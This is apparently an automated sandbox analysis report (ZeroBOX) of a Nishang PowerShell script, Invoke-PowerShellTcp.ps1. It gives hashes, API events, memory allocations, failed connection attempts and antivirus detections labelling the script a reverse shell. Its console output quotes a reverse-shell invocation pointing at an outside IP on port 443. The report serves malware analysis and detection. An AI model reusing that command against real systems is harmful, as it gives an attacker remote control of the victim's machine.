Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 24, 2023, 3:59 p.m.	Aug. 24, 2023, 4:01 p.m.

Size	4.3KB
Type	ASCII text
MD5	`5661f942f86c50b5b845f675613bc1aa`
SHA256	`3d125cab61a0706e93ddcec51032232e833e8998fcd14eca7892ae902e5174db`
CRC32	`81B17DC9`
ssdeep	`96:J+rbXHvonUsYqwLZvUqVn/0b37DMo6XBr4qIVCqiMn:Jyb3QCK+lo6XBEfVCqiO`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Invoke-PowerShellTcp.ps1
2552

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
35.174.153.211	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 24, 2023, 3:59 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: WARNING: Something went wrong! Check if the server is reachable and you are using the correct port. console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: Invoke-PowerShellTcp : Exception calling ".ctor" with "2" argument(s): "No conn console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: ection could be made because the target machine actively refused it 35.174.153. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Invoke-PowerShellTcp.ps1:127 char:21 console_handle: 0x00000053	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: + Invoke-PowerShellTcp <<<< -Reverse -IPAddress 35.174.153.211 -Port 443 console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: tion console_handle: 0x00000077	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio console_handle: 0x00000083	1	1
WriteConsoleW Aug. 24, 2023, 3:59 p.m.	buffer: n,Invoke-PowerShellTcp console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 24, 2023, 3:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050607d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02679000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06370000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06433000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 3:59 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Communicates with host for which no DNS query was performed (1 event)

host

35.174.153.211

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

ALYac	Heur.BZC.PZQ.Boxter.81.3CD63824
Sangfor	Hacktool.Generic-Script.Save.14e69ed4
Cyren	PSH/Nishang.B
Symantec	Hacktool.Nishang
ESET-NOD32	PowerShell/RiskWare.RemoteShell.F
Avast	Script:SNH-gen [PUP]
Cynet	Malicious (score: 99)
Kaspersky	Backdoor.PowerShell.Agent.be
BitDefender	Heur.BZC.PZQ.Boxter.81.3D2A2567
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.81.3D2A2567
Rising	HackTool.Generic!8.46D (TOPIS:E0:qe1CsWPSh5H)
Emsisoft	Heur.BZC.PZQ.Boxter.81.3D2A2567 (B)
F-Secure	PrivacyRisk.SPR/RemoteShell.LFJB
DrWeb	PowerShell.ReverseShell.8
VIPRE	Heur.BZC.PZQ.Boxter.81.3CD63824
McAfee-GW-Edition	BehavesLike.PS.Suspicious.xr
FireEye	Heur.BZC.PZQ.Boxter.81.3D2A2567
Sophos	ATK/Nishang-A
GData	Heur.BZC.PZQ.Boxter.81.3D2A2567
Avira	SPR/RemoteShell.LFJB
MAX	malware (ai score=86)
Arcabit	Heur.BZC.PZQ.Boxter.81.3CD63824
ZoneAlarm	Backdoor.PowerShell.Agent.be
Microsoft	Trojan:PowerShell/HackScript.A
Google	Detected
McAfee	HTool-Nishang
Ikarus	Trojan.PowerShell.Reverseshell
AVG	Script:SNH-gen [PUP]

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	192.168.56.101:49163
dead_host	35.174.153.211:443

Invoke-PowerShellTcp.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All